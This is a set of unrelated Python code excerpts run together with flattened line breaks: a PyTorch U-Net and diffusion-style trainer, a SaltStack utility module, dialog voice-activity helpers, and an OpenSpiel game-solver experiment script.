1, unbiased = False, keepdim = True).sqrt() mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (std + self.eps) * self.g + self.b class PreNorm(nn.Module): def __init__(self, dim, fn): super().__init__() self.fn = fn self.norm = LayerNorm(dim) def forward(self, x): x = self.norm(x) return self.fn(x) # building block modules class Block(nn.Module): def __init__(self, dim, dim_out, groups = 8): super().__init__() self.block = nn.Sequential( nn.Conv2d(dim, dim_out, 3, padding=1), nn.GroupNorm(groups, dim_out), Mish() ) def forward(self, x): return self.block(x) class ResnetBlock(nn.Module): def __init__(self, dim, dim_out, *, time_emb_dim = None, groups = 8): super().__init__() self.mlp = nn.Sequential( Mish(), nn.Linear(time_emb_dim, dim_out) ) if exists(time_emb_dim) else None self.block1 = Block(dim, dim_out) self.block2 = Block(dim_out, dim_out) self.res_conv = nn.Conv2d(dim, dim_out, 1) if dim != dim_out else nn.Identity() def forward(self, x, time_emb): h = self.block1(x) if exists(self.mlp): h += self.mlp(time_emb)[:, :, None, None] h = self.block2(h) return h + self.res_conv(x) class LinearAttention(nn.Module): def __init__(self, dim, heads = 4, dim_head = 32): super().__init__() self.heads = heads hidden_dim = dim_head * heads self.to_qkv = nn.Conv2d(dim, hidden_dim * 3, 1, bias = False) self.to_out = nn.Conv2d(hidden_dim, dim, 1) def forward(self, x): b, c, h, w = x.shape qkv = self.to_qkv(x) q, k, v = rearrange(qkv, 'b (qkv heads c) h w -> qkv b heads c (h w)', heads = self.heads, qkv=3) k = k.softmax(dim=-1) context = torch.einsum('bhdn,bhen->bhde', k, v) out = torch.einsum('bhde,bhdn->bhen', context, q) out = rearrange(out, 'b heads c (h w) -> b (heads c) h w', heads=self.heads, h=h, w=w) return self.to_out(out) # model class Unet(nn.Module): def __init__( self, dim, out_dim = None, dim_mults=(1, 2, 4, 8), groups = 8, channels = 3, with_time_emb = True ): super().__init__() self.channels = channels dims = [channels, *map(lambda m: dim * m, dim_mults)] in_out = list(zip(dims[:-1], dims[1:])) if with_time_emb: time_dim = dim self.time_mlp = nn.Sequential( SinusoidalPosEmb(dim), nn.Linear(dim, dim * 4), Mish(), nn.Linear(dim * 4, dim) ) else: time_dim = None self.time_mlp = None self.downs = nn.ModuleList([]) self.ups = nn.ModuleList([]) num_resolutions = len(in_out) for ind, (dim_in, dim_out) in enumerate(in_out): is_last = ind >= (num_resolutions - 1) self.downs.append(nn.ModuleList([ ResnetBlock(dim_in, dim_out, time_emb_dim = time_dim), ResnetBlock(dim_out, dim_out, time_emb_dim = time_dim), Residual(PreNorm(dim_out, LinearAttention(dim_out))), Downsample(dim_out) if not is_last else nn.Identity() ])) mid_dim = dims[-1] self.mid_block1 = ResnetBlock(mid_dim, mid_dim, time_emb_dim = time_dim) self.mid_attn = Residual(PreNorm(mid_dim, LinearAttention(mid_dim))) self.mid_block2 = ResnetBlock(mid_dim, mid_dim, time_emb_dim = time_dim) for ind, (dim_in, dim_out) in enumerate(reversed(in_out[1:])): is_last = ind >= (num_resolutions - 1) self.ups.append(nn.ModuleList([ ResnetBlock(dim_out * 2, dim_in, time_emb_dim = time_dim), ResnetBlock(dim_in, dim_in, time_emb_dim = time_dim), Residual(PreNorm(dim_in, LinearAttention(dim_in))), Upsample(dim_in) if not is_last else nn.Identity() ])) out_dim = default(out_dim, channels) self.final_conv = nn.Sequential( Block(dim, dim), nn.Conv2d(dim, out_dim, 1) ) def forward(self, x, time): t = self.time_mlp(time) if exists(self.time_mlp) else None h = [] for resnet, resnet2, attn, downsample in self.downs: x = resnet(x, t) x = resnet2(x, t) x = attn(x) h.append(x) x = downsample(x) x = self.mid_block1(x, t) x = self.mid_attn(x) x = self.mid_block2(x, t) for resnet, resnet2, attn, upsample in self.ups: x = torch.cat((x, h.pop()), dim=1) x = resnet(x, t) x = resnet2(x, t) x = attn(x) x = upsample(x) return self.final_conv(x) class GBM(nn.Module): def __init__( self, model, image_size, channels = 3, subtimeseries_length = 3, timesteps = 500, loss_type = 'l1', device='cuda' ): super().__init__() self.model = model self.image_size = image_size self.channels = channels self.k = subtimeseries_length self.num_timesteps = timesteps self.loss_type = loss_type self.device=device def extract(self, a, t, x_shape): b, *_ = t.shape out = a.gather(-1, t) return out.reshape(b, *((1,) * (len(x_shape) - 1))) @torch.no_grad() def p_sample(self, x, t): # mu_sigma = self.propagator(x, t) # mu=mu_sigma[:,:self.channels] # sigma=mu_sigma[:,self.channels:] # diff = self.propagator(x,t) # x_t = self.time_evolution(x, t, mu, sigma) # return x_t # diff = self.model(x,t) # return self.time_evolution(x, diff) err = self.model(x, t) mu=err[:,:self.channels] sigma=err[:,self.channels:] return x-(mu+sigma*torch.randn_like(x)) @torch.no_grad() def p_sample_loop(self, img, shape): b,_,h,w = shape for i in tqdm(reversed(range(0, self.num_timesteps)), desc='sampling loop time step', total=self.num_timesteps): img = self.p_sample(img, torch.full((b,), i, dtype=torch.long, device=self.device)) return img @torch.no_grad() def sample(self, x, batch_size = 16): image_size = self.image_size channels = self.channels return self.p_sample_loop(x, (batch_size, channels, image_size, image_size)) def sub_timeseries(self, x, t): b,n,c,h,w = x.shape mask = torch.zeros_like(x) for count, i in enumerate(t): for j in range(-self.k,self.k+1): mask[count,i+j] = 1 return x[mask==1].reshape(b,self.k*2+1,c,h,w) def stack_on_axis(self,x): return torch.cat([x[:,i] for i in range(self.k*2+1)], dim=1) def time_evolution(self, x, t, mu, sigma): W_t = torch.zeros_like(x) for count, i in enumerate(t): for j in range(i): W_t[count] += torch.randn_like(x)[0] prop = torch.exp((mu + 0.5*sigma**2) + sigma*W_t) #Propagator assert x.shape == prop.shape, f'Input shape {x.shape} must be equal to the propagator shape {prop.shape}' return x*prop # print(f"x start mean: {x.mean().item()} std:{x.std().item()}") # x_mean = x*torch.exp(mu) # x_var = torch.sqrt(x**2 * torch.exp(2*mu)*(torch.exp(sigma**2)-1)) # x = x_mean + x_var*torch.randn_like(x) # print(f"x after mean: {x.mean().item()} std:{x.std().item()}") # print(f"x_mean mean: {x_mean.mean().item()} std:{x_mean.std().item()}") # print(f"x_std start mean: {x_var.mean().item()} std:{x_var.std().item()}") # print(f"x**2 mean: {(x**2).mean().item()} std:{(x**2).std().item()}") # print(f"exp(2*mu) mean: {torch.exp(2*mu).mean().item()} std:{torch.exp(2*mu).std().item()}") # print(f"exp(sigma**2) mean: {torch.exp(sigma**2).mean().item()} std:{torch.exp(sigma**2).std().item()}") # print(f"mu start mean: {mu.mean().item()} std:{mu.std().item()}") # print(f"sigma start mean: {sigma.mean().item()} std:{sigma.std().item()}\n") # return x # def time_evolution(self, x, err): # # return (x-err)+ err*torch.randn_like(x) # return x-err def p_losses(self, x_start, t, y=None): x_start = self.sub_timeseries(x_start, t) gt_mu = torch.mean(x_start,dim=1) gt_sigma = torch.clamp(torch.std(x_start,dim=1),0.0000001) err = self.model(x_start[:,self.k-1], t) p_mu=err[:,:self.channels] p_sigma=torch.clamp(err[:,self.channels:],0.0000001) # print(p_mu.min(), p_mu.max(), gt_mu.min(), gt_mu.max()) x_t = self.time_evolution(x_start[:,self.k-1], t, p_mu, p_sigma) if self.loss_type == 'l1': loss = (x_t - x_start[:,self.k]).abs().mean() elif self.loss_type == 'l2': loss = F.mse_loss(x_t, x_start[:,self.k]) # loss = F.mse_loss(gt_mu-p_mu) + F.mse_loss(gt_sigma, p_sigma) # loss = F.mse_loss(x_start[:,k]-x_start[:,k-1], err) # loss = F.mse_loss(mu + sigma*torch.randn_like(x_start[:,0]),torch.randn_like(x_start[:,0])) # loss += F.mse_loss(x_t, x_start[:,k]) # loss = F.mse_loss((x_start[:,k]-x_start[:,k-1]), mu+sigma*torch.randn_like(x_start[:,k])) p = torch.distributions.normal.Normal(p_mu, p_sigma) q = torch.distributions.normal.Normal(gt_mu, gt_sigma) # q = torch.distributions.normal.Normal(torch.zeros_like(p_mu), torch.ones_like(p_mu)) loss += torch.distributions.kl.kl_divergence(p, q).mean() return loss def forward(self, x, y=None, *args, **kwargs): x = x if len(x.shape) == 5 else x[:,:,None] b, n, c, h, w, device, img_size, = *x.shape, x.device, self.image_size assert h == img_size and w == img_size, f'height {h} and width {w} of image must be {img_size}' t = torch.randint(self.k, self.num_timesteps-self.k-1, (b,), device=device).long() return self.p_losses(x, t, y, *args, **kwargs) # trainer class class TrainerGBM(object): def __init__( self, model, train_loader, valid_loader, train_batch_size = 32, train_lr = 2e-5, train_num_steps = 100000, gradient_accumulate_every = 2,
<reponame>makinacorpus/makina-states # -*- coding: utf-8 -*- ''' .. _module_mc_utils: mc_utils / Some usefull small tools ==================================== ''' # Import salt libs from pprint import pformat import copy import cProfile import crypt import collections import datetime import traceback import socket import hashlib import logging import os import pstats import re import salt.loader import salt.template from salt.config import master_config, minion_config from salt.exceptions import SaltException import salt.utils import salt.utils.dictupdate import salt.utils.network from salt.utils.pycrypto import secure_password from salt.utils.odict import OrderedDict from salt.ext import six as six from mc_states import api import mc_states.api from distutils.version import LooseVersion _CACHE = {'mid': None} _default_marker = object() _marker = object() log = logging.getLogger(__name__) is_really_a_var = re.compile('(\{[^:}]+\})', re.M | re.U) def loose_version(*args, **kw): return LooseVersion(*args, **kw) def empty_caches(extras=None): if not extras: extras = [] for i in extras + [_CACHE]: if isinstance(i, dict): for a in [b for b in i]: i.pop(a, None) for cache in [ mc_states.api._LOCAL_CACHES, ]: for i in [a for a in cache]: val = cache[a] if isinstance(val, dict): for v in [b for b in val]: val.pop(v, None) else: cache.pop(i, None) _CACHE['mid'] = None def assert_good_grains(grains): '''' no time to search/debug why, but sometimes grains dict is empty depending on the call context grains loading bug retriggered (i fixed once, do not remember where, FU SALT ... ''' if not grains: grains = salt.loader.grains(__opts__) return grains def hash(string, typ='md5', func='hexdigest'): ''' Return the hash of a string CLI Examples:: salt-call --local mc_utils.hash foo salt-call --local mc_utils.hash foo md5 salt-call --local mc_utils.hash foo sha1 salt-call --local mc_utils.hash foo sha224 salt-call --local mc_utils.hash foo sha256 salt-call --local mc_utils.hash foo sha384 salt-call --local mc_utils.hash foo sha512 ''' if func not in ['hexdigest', 'digest']: func = 'hexdigest' if typ not in [ 'md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512' ]: raise TypeError('{0} is not valid hash'.format(typ)) return getattr(getattr(hashlib, typ)(string), func)() def uniquify(*a, **kw): return api.uniquify(*a, **kw) def odict(instance=True): if instance: return OrderedDict() return OrderedDict def local_minion_id(force=False): ''' search in running config root then in well known config salt root then use regular salt function ''' mid = _CACHE['mid'] if mid and not force: return mid paths = api.uniquify([__opts__['config_dir'], '/etc/salt']) for path in paths: for cfgn, fun in OrderedDict( [('master', master_config), ('minion', minion_config)] ).items(): cfg = os.path.join(path, cfgn) if os.path.exists(cfg): try: cfgo = fun(cfg) mid = cfgo.get('id', None) if mid.endswith('_master'): mid = None except Exception: pass if mid: break if mid: break # normally we should never hit this case as salt generates # internally during config parsing the minion id if not mid: mid = salt.utils.network.generate_minion_id() _CACHE['mid'] = mid return mid def magicstring(thestr): """ Convert any string to UTF-8 ENCODED one """ return api.magicstring(thestr) def generate_stored_password(key, length=None, force=False, value=None): ''' Generate and store a password. At soon as one is stored with a specific key, it will never be renegerated unless you set force to true. ''' if length is None: length = 16 reg = __salt__[ 'mc_macros.get_local_registry']( 'local_passwords', registry_format='pack') sav = False if not key in reg: sav = True rootpw = reg.setdefault(key, __salt__['mc_utils.generate_password'](length)) if force or not rootpw: rootpw = __salt__['mc_utils.generate_password'](length) sav = True if value is not None: rootpw = value reg[key] = rootpw __salt__['mc_macros.update_local_registry']( 'local_passwords', reg, registry_format='pack') return rootpw def generate_password(length=None): if length is None: length = 16 return secure_password(length) class _CycleError(Exception): '''.''' def __init__(self, msg, new=None, original_dict=None, *args, **kwargs): super(_CycleError, self).__init__(msg, *args, **kwargs) self.new = new self.original_dict = original_dict def deepcopy(arg): return copy.deepcopy(arg) def update_no_list(dest, upd, recursive_update=True): ''' Recursive version of the default dict.update Merges upd recursively into dest But instead of merging lists, it overrides them from target dict ''' if (not isinstance(dest, collections.Mapping)) \ or (not isinstance(upd, collections.Mapping)): raise TypeError('Cannot update using non-dict types in dictupdate.update()') updkeys = list(upd.keys()) if not set(list(dest.keys())) & set(updkeys): recursive_update = False if recursive_update: for key in updkeys: val = upd[key] try: dest_subkey = dest.get(key, None) except AttributeError: dest_subkey = None if isinstance(dest_subkey, collections.Mapping) \ and isinstance(val, collections.Mapping): ret = update_no_list(dest_subkey, val) dest[key] = ret else: dest[key] = upd[key] return dest else: try: dest.update(upd) except AttributeError: # this mapping is not a dict for k in upd: dest[k] = upd[k] return dest def dictupdate(dict1, dict2): ''' Merge two dictionnaries recursively test:: salt '*' mc_utils.dictupdate '{foobar: {toto: tata, toto2: tata2},titi: tutu}' '{bar: toto, foobar: {toto2: arg, toto3: arg2}}' ---------- bar: toto foobar: ---------- toto: tata toto2: arg toto3: arg2 titi: tutu ''' if not isinstance(dict1, dict): raise SaltException( 'mc_utils.dictupdate 1st argument is not a dictionnary!') if not isinstance(dict2, dict): raise SaltException( 'mc_utils.dictupdate 2nd argument is not a dictionnary!') return update_no_list(dict1, dict2) def copy_dictupdate(dict1, dict2): ''' Similar to dictupdate but with deepcopy of two merged dicts first. ''' return dictupdate(copy.deepcopy(dict1), copy.deepcopy(dict2)) def unresolved(data): ret = None if isinstance(data, six.string_types): if '{' in data and '}' in data: if is_really_a_var.search(data): ret = True else: ret = False else: ret = False elif isinstance(data, dict): for k, val in six.iteritems(data): ret1 = unresolved(k) ret2 = unresolved(val) ret = ret1 or ret2 if ret: break elif isinstance(data, (list, set)): for val in data: ret = unresolved(val) if ret: break return ret def _str_resolve(new, original_dict=None, this_call=0, topdb=False): ''' low level and optimized call to format_resolve ''' init_new = new # do not directly call format to handle keyerror in original mapping # where we may have yet keyerrors if isinstance(original_dict, dict): for k in original_dict: reprk = k if not isinstance(reprk, six.string_types): reprk = '{0}'.format(k) subst = '{' + reprk + '}' if subst in new: subst_val = original_dict[k] if isinstance(subst_val, (list, dict)): inner_new = format_resolve( subst_val, original_dict, this_call=this_call, topdb=topdb) # composed, we take the repr if new != subst: new = new.replace(subst, str(inner_new)) # no composed value, take the original list else: new = inner_new else: if new != subst_val: new = new.replace(subst, str(subst_val)) if not unresolved(new): # new value has been totally resolved break return new, new != init_new def str_resolve(new, original_dict=None, this_call=0, topdb=False): return _str_resolve( new, original_dict=original_dict, this_call=this_call, topdb=topdb)[0] def _format_resolve(value, original_dict=None, this_call=0, topdb=False, retry=None, **kwargs): ''' low level and optimized call to format_resolve ''' if not original_dict: original_dict = OrderedDict() if this_call == 0: if not original_dict and isinstance(value, dict): original_dict = value changed = False if kwargs: original_dict.update(kwargs) if not unresolved(value): return value, False if isinstance(value, dict): new = type(value)() for key, v in value.items(): val, changed_ = _format_resolve(v, original_dict, topdb=topdb) if changed_: changed = changed_ new[key] = val elif isinstance(value, (list, tuple)): new = type(value)() for v in value: val, changed_ = _format_resolve(v, original_dict, topdb=topdb) if changed_: changed = changed_ new = new + type(value)([val]) elif isinstance(value, six.string_types): new, changed_ = _str_resolve(value, original_dict, topdb=topdb) if changed_: changed = changed_ else: new = value if retry is None: retry = unresolved(new) while retry and (this_call < 100): new, changed = _format_resolve(new, original_dict, this_call=this_call, retry=False, topdb=topdb) if not changed: retry = False this_call += 1 return new, changed def format_resolve(value, original_dict=None, this_call=0, topdb=False, **kwargs): ''' Resolve a dict of formatted strings, mappings & list to a valued dict Please also read the associated test:: {"a": ["{b}", "{c}", "{e}"], "b": 1, "c": "{d}", "d": "{b}", "e": "{d}", } ====> {"a": ["1", "1", "{e}"], "b": 1, "c": "{d}", "d": "{b}", "e": "{d}", } ''' return _format_resolve(value, original_dict=original_dict, this_call=this_call, topdb=topdb, **kwargs)[0] def is_a_str(value): ''' is the value a stirng ''' return isinstance(value, six.string_types) def is_a_bool(value): ''' is the value a bool ''' return isinstance(value, bool) def is_a_int(value): ''' is the value an int ''' return isinstance(value, int) def is_a_float(value): ''' is the value a float ''' return isinstance(value, float) def is_a_complex(value): ''' is the value a complex ''' return isinstance(value, complex) def is_a_long(value): ''' is the value a long ''' return isinstance(value, long) def is_a_number(value): ''' is the value a number ''' return ( is_a_int(value) or is_a_float(value) or is_a_complex(value) or is_a_long(value) ) def is_a_set(value): ''' is the value a set ''' return isinstance(value, set) def is_a_tuple(value): ''' is the value a tuple ''' return isinstance(value, tuple) def is_a_list(value): ''' is the value a list ''' return isinstance(value, list) def is_a_dict(value): ''' is the value a dict ''' return isinstance(value, dict) def is_iter(value): ''' is the value iterable (list, set, dict tuple) ''' return ( is_a_list(value) or is_a_dict(value) or is_a_tuple(value) or is_a_set(value) ) def traverse_dict(data, key, delimiter=salt.utils.DEFAULT_TARGET_DELIM): ''' Handle the fact to traverse dicts
import torch import torch.nn.functional as F from einops import rearrange def time_to_frames(time, frame_hz): if isinstance(time, list): time = torch.tensor(time) frame = time * frame_hz if isinstance(frame, torch.Tensor): frame = frame.long().tolist() else: frame = int(frame) return frame def frame2time(f, frame_time): return f * frame_time def time2frames(t, hop_time): return int(t / hop_time) def find_island_idx_len(x): """ Finds patches of the same value. starts_idx, duration, values = find_island_idx_len(x) e.g: ends = starts_idx + duration s_n = starts_idx[values==n] ends_n = s_n + duration[values==n] # find all patches with N value """ assert x.ndim == 1 n = len(x) y = x[1:] != x[:-1] # pairwise unequal (string safe) i = torch.cat( (torch.where(y)[0], torch.tensor(n - 1, device=x.device).unsqueeze(0)) ).long() it = torch.cat((torch.tensor(-1, device=x.device).unsqueeze(0), i)) dur = it[1:] - it[:-1] idx = torch.cumsum( torch.cat((torch.tensor([0], device=x.device, dtype=torch.long), dur)), dim=0 )[ :-1 ] # positions return idx, dur, x[i] def find_label_match(source_idx, target_idx): match = torch.where(source_idx.unsqueeze(-1) == target_idx) midx = target_idx[match[-1]] # back to original idx frames = torch.zeros_like(source_idx) # Does not work on gpu: frames[match[:-1]] = 1.0 frames[match[:-1]] = torch.ones_like(match[0]) return frames, midx def get_dialog_states(vad) -> torch.Tensor: """Vad to the full state of a 2 person vad dialog 0: only speaker 0 1: none 2: both 3: only speaker 1 """ assert vad.ndim >= 1 return (2 * vad[..., 1] - vad[..., 0]).long() + 1 def last_speaker_single(s): start, _, val = find_island_idx_len(s) # exlude silences (does not effect last_speaker) # silences should be the value of the previous speaker sil_idx = torch.where(val == 1)[0] if len(sil_idx) > 0: if sil_idx[0] == 0: val[0] = 2 # 2 is both we don't know if its a shift or hold sil_idx = sil_idx[1:] val[sil_idx] = val[sil_idx - 1] # map speaker B state (=3) to 1 val[val == 3] = 1 # get repetition lengths repeat = start[1:] - start[:-1] # Find difference between original and repeated # and use diff to repeat the last speaker until the end of segment diff = len(s) - repeat.sum(0) repeat = torch.cat((repeat, diff.unsqueeze(0))) # repeat values to create last speaker over entire segment last_speaker = torch.repeat_interleave(val, repeat) return last_speaker def get_last_speaker(vad, ds): assert vad.ndim > 1, "must provide vad of size: (N, channels) or (B, N, channels)" # get last active speaker (for turn shift/hold) if vad.ndim < 3: last_speaker = last_speaker_single(ds) else: # (B, N, Channels) = (B, N, n_speakers) last_speaker = [] for b in range(vad.shape[0]): s = ds[b] last_speaker.append(last_speaker_single(s)) last_speaker = torch.stack(last_speaker) return last_speaker def vad_list_to_onehot(vad_list, hop_time, duration, channel_last=False): n_frames = time2frames(duration, hop_time) + 1 if isinstance(vad_list[0][0], list): vad_tensor = torch.zeros((len(vad_list), n_frames)) for ch, ch_vad in enumerate(vad_list): for v in ch_vad: s = time2frames(v[0], hop_time) e = time2frames(v[1], hop_time) vad_tensor[ch, s:e] = 1.0 else: vad_tensor = torch.zeros((1, n_frames)) for v in vad_list: s = time2frames(v[0], hop_time) e = time2frames(v[1], hop_time) vad_tensor[:, s:e] = 1.0 if channel_last: vad_tensor = vad_tensor.permute(1, 0) return vad_tensor def vad_to_dialog_vad_states(vad) -> torch.Tensor: """Vad to the full state of a 2 person vad dialog 0: only speaker 0 1: none 2: both 3: only speaker 1 """ assert vad.ndim >= 1 return (2 * vad[..., 1] - vad[..., 0]).long() + 1 def mutual_silences(vad, ds=None): if ds is None: ds = vad_to_dialog_vad_states(vad) return ds == 1 def get_current_vad_onehot(vad, end, duration, speaker, frame_size): """frame_size in seconds""" start = end - duration n_frames = int(duration / frame_size) vad_oh = torch.zeros((2, n_frames)) for ch, ch_vad in enumerate(vad): for s, e in ch_vad: if start <= s <= end: rel_start = s - start v_start_frame = round(rel_start / frame_size) if start <= e <= end: # vad segment completely in chunk rel_end = e - start v_end_frame = round(rel_end / frame_size) vad_oh[ch, v_start_frame : v_end_frame + 1] = 1.0 else: # only start in chunk -> fill until end vad_oh[ch, v_start_frame:] = 1.0 elif start <= e <= end: # only end in chunk rel_end = e - start v_end_frame = round(rel_end / frame_size) vad_oh[ch, : v_end_frame + 1] = 1.0 elif s > end: break # current speaker is always channel 0 if speaker == 1: vad_oh = torch.stack((vad_oh[1], vad_oh[0])) return vad_oh def get_next_speaker(vad, ds): """Doing `get_next_speaker` in reverse""" # Reverse Vad vad_reversed = vad.flip(dims=(1,)) ds_reversed = ds.flip(dims=(1,)) # get "last speaker" next_speaker = get_last_speaker(vad_reversed, ds_reversed) # reverse back next_speaker = next_speaker.flip(dims=(1,)) return next_speaker def get_hold_shift_onehot(vad): ds = vad_to_dialog_vad_states(vad) prev_speaker = get_last_speaker(vad, ds) next_speaker = get_next_speaker(vad, ds) silence_ids = torch.where(vad.sum(-1) == 0) hold_one_hot = torch.zeros_like(prev_speaker) shift_one_hot = torch.zeros_like(prev_speaker) hold = prev_speaker[silence_ids] == next_speaker[silence_ids] hold_one_hot[silence_ids] = hold.long() shift_one_hot[silence_ids] = torch.logical_not(hold).long() return hold_one_hot, shift_one_hot # vad context history def get_vad_condensed_history(vad, t, speaker, bin_end_times=[60, 30, 15, 5, 0]): """ get the vad-condensed-history over the history of the dialog. the amount of active seconds are calculated for each speaker in the segments defined by `bin_end_times` (starting from 0). The idea is to represent the past further away from the current moment in time more granularly. for example: bin_end_times=[60, 30, 10, 5, 0] extracts activity for each speaker in the intervals: [-inf, t-60] [t-60, t-30] [t-30, t-10] [t-10, t-5] [t-50, t] The final representation is then the ratio of activity for the relevant `speaker` over the total activity, for each bin. if there is no activity, that is the segments span before the dialog started or (unusually) both are silent, then we set the ratio to 0.5, to indicate equal participation. Argument: - vad: list: [[(0, 3), (4, 6), ...], [...]] list of list of channel start and end time """ n_bins = len(bin_end_times) T = t - torch.tensor(bin_end_times) bin_times = [0] + T.tolist() bins = torch.zeros(2, n_bins) for ch, ch_vad in enumerate(vad): # iterate over each channel s = bin_times[0] for i, e in enumerate(bin_times[1:]): # iterate over bin segments if e < 0: # skip if before dialog start s = e # update continue for vs, ve in ch_vad: # iterate over channel VAD if vs >= s: # start inside bin time if vs < e and ve <= e: # both vad_start/end occurs in segment bins[ch][i] += ve - vs elif vs < e: # only start occurs in segment bins[ch][i] += e - vs elif ( vs > e ): # all starts occus after bin-end -> no need to process further break else: # vs is before segment if s <= ve <= e: # ending occurs in segment bins[ch][i] += ve - s # update bin start s = e # Avoid nan -> for loop # get the ratio of the relevant speaker # if there is no information (bins are before dialog start) we use an equal prior (=.5) ratios = torch.zeros(n_bins) for b in range(n_bins): binsum = bins[:, b].sum() if binsum > 0: ratios[b] = bins[speaker, b] / binsum else: ratios[b] = 0.5 # equal prior for segments with no one speaking return ratios @torch.no_grad() def get_activity_history(vad_frames, bin_end_frames, channel_last=True): """ Uses convolutions to sum the activity over each segment of interest. The kernel size is set to be the number of frames of any particular segment i.e. --------------------------------------------------- ``` ... h0 | h1 | h2 | h3 | h4 + distant past | | | | + -inf -> -t0 | | | | + ``` --------------------------------------------------- Arguments: vad_frames: torch.tensor: (Channels, N_Frames) or (N_Frames, Channels) bin_end_frames: list: boundaries for the activity history windows i.e. [6000, 3000, 1000, 500] channel_last: bool: if true we expect `vad_frames` to be (N_Frames, Channels) Returns: ratios: torch.tensor: (Channels, N_frames, bins) or (N_frames, bins, Channels) (dependent on `channel_last`) history_bins: torch.tesnor: same size as ratio but contains the number of active frames, over each segment, for both speakers. """ N = vad_frames.shape[0] if channel_last: vad_frames = rearrange(vad_frames, "n c -> c n") # container for the activity of the defined bins hist_bins = [] # Distance past activity history/ratio # The segment from negative infinity to the first bin_end_frames if vad_frames.shape[0] > bin_end_frames[0]: h0 = vad_frames[:, : -bin_end_frames[0]].cumsum(dim=-1) diff_pad = torch.ones(2, bin_end_frames[0]) * -1
from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import xdo import time import pyspiel import argparse import datetime import numpy as np from tqdm import tqdm from dependencies.open_spiel.python import policy from dependencies.open_spiel.python.algorithms import cfr from dependencies.open_spiel.python.algorithms import psro_oracle from dependencies.open_spiel.python.algorithms import best_response from dependencies.open_spiel.python.algorithms import exploitability from dependencies.open_spiel.python.algorithms import get_all_states from dependencies.open_spiel.python.algorithms import fictitious_play from dependencies.open_spiel.python.algorithms import expected_game_score from dependencies.open_spiel.python.algorithms.cfr_cfr import OnlineTraining from dependencies.open_spiel.python.algorithms import external_sampling_mccfr as external_mccfr module_path = os.path.abspath(os.path.join('')) if module_path not in sys.path: sys.path.append(module_path) def ensure_dir(file_path): directory = os.path.dirname(file_path) if not os.path.exists(directory): os.makedirs(directory, exist_ok=True) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-g', '--game_name', type=str, required=False, default="leduc_poker", choices=["leduc_poker", "kuhn_poker", "leduc_poker_dummy", "oshi_zumo"]) parser.add_argument('-a', '--algorithm', required=False, default="xodo", type=str, choices=["psro", "cfr", "xfp", "xdo", "xodo_eps", "lcfr_plus", "xodo", "lcfr", "xodo_eps", "lcfr_plus_eps", "cfr_eps"]) parser.add_argument('-m', '--meta_solver', required=False, default="lcfr_plus", type=str, choices=["outcome", "external", "xfp", "lcfr_plus", "cfr"]) parser.add_argument('-r', '--random_br', default="False", type=str, choices=["True", "False"]) parser.add_argument('-o', '--old', default="False", type=str, choices=["True", "False"]) parser.add_argument('-i', '--iterations', default=100000000, type=int) parser.add_argument('-x', '--xodo_iterations', default=50, type=int) # Parse arguments commandline_args = parser.parse_args() iterations = commandline_args.iterations xodo_iterations = commandline_args.xodo_iterations algorithm = commandline_args.algorithm game_name = commandline_args.game_name meta_solver = commandline_args.meta_solver random_max_br = commandline_args.random_br old_schedule = commandline_args.old if old_schedule: starting_br_conv_threshold = 2 ** 4 else: starting_br_conv_threshold = 0.05 extra_info = datetime.datetime.now().strftime("%I.%M.%S%p_%b-%d-%Y") # Set up game environment if game_name == "oshi_zumo": COINS = 4 SIZE = 1 HORIZON = 6 game = pyspiel.load_game(game_name, { "coins": pyspiel.GameParameter(COINS), "size": pyspiel.GameParameter(SIZE), "horizon": pyspiel.GameParameter(HORIZON) }) game = pyspiel.convert_to_turn_based(game) pretty_game_name = f'{game_name}c{COINS}s{SIZE}h{HORIZON}' else: game = pyspiel.load_game(game_name) pretty_game_name = game_name def run(solver, iterations): checkpoint_period = 5 if algorithm == 'external_mccfr': checkpoint_period = 15000 start_time = time.time() times = [] exps = [] episodes = [] cfr_infostates = [] if algorithm == 'psro': size_of_game = len(get_all_states.get_all_states(game, include_chance_states=True)) num_infostates_expanded = size_of_game * 2 for i in range(iterations): if algorithm in ['cfr', 'lcfr_plus', 'lcfr']: solver.evaluate_and_update_policy() else: solver.iteration() if i % checkpoint_period == 0: if algorithm in ['cfr', 'lcfr_plus', 'lcfr']: average_policy = solver.average_policy() elif algorithm == 'external_mccfr': try: average_policy = solver.average_policy() except AttributeError: print('making tabular policy from callable') average_policy = policy.tabular_policy_from_callable(game, solver.callable_avg_policy()) print('done') elif algorithm == 'xfp': average_policy = solver.average_policy() elif algorithm == 'psro': average_policy = solver._current_policy num_infostates_expanded += size_of_game * 2 else: raise ValueError(f"Unknown algorithm name: {algorithm}") print('beginning exploitability calculation') conv = exploitability.exploitability(game, average_policy) print("Iteration {} exploitability {}".format(i, conv)) elapsed_time = time.time() - start_time print(elapsed_time) times.append(elapsed_time) exps.append(conv) episodes.append(i) save_prefix = './results/' + algorithm + '_' + pretty_game_name + extra_info ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(episodes)) if algorithm in ['cfr', 'external_mccfr', 'lcfr_plus', 'lcfr', 'xfp']: cfr_infostates.append(solver.num_infostates_expanded * (i + 1)) print("Num infostates expanded (mil): ", solver.num_infostates_expanded * (i + 1) / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(cfr_infostates)) elif algorithm in ['psro']: cfr_infostates.append(num_infostates_expanded) print("Num infostates expanded (mil): ", num_infostates_expanded / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(cfr_infostates)) if algorithm == 'cfr': solver = cfr.CFRSolver(game) run(solver, iterations) elif algorithm == 'lcfr': solver = cfr.LCFRSolver(game) run(solver, iterations) elif algorithm == 'lcfr_plus': # In the implementation of OpSpiel, CFRPlusSolver is LCFR+ solver = cfr.CFRPlusSolver(game) run(solver, iterations) elif algorithm == 'external_mccfr': solver = external_mccfr.ExternalSamplingSolver(game) run(solver, iterations) elif algorithm == 'xfp': solver = fictitious_play.XFPSolver(game) run(solver, iterations) elif algorithm == 'xdo': # brs = [] xdo_iterations = 50 if meta_solver == 'external': xdo_iterations = 200 elif meta_solver == 'xfp': xdo_iterations = 5 inner_thresh = .35 info_test = [] size_of_game = 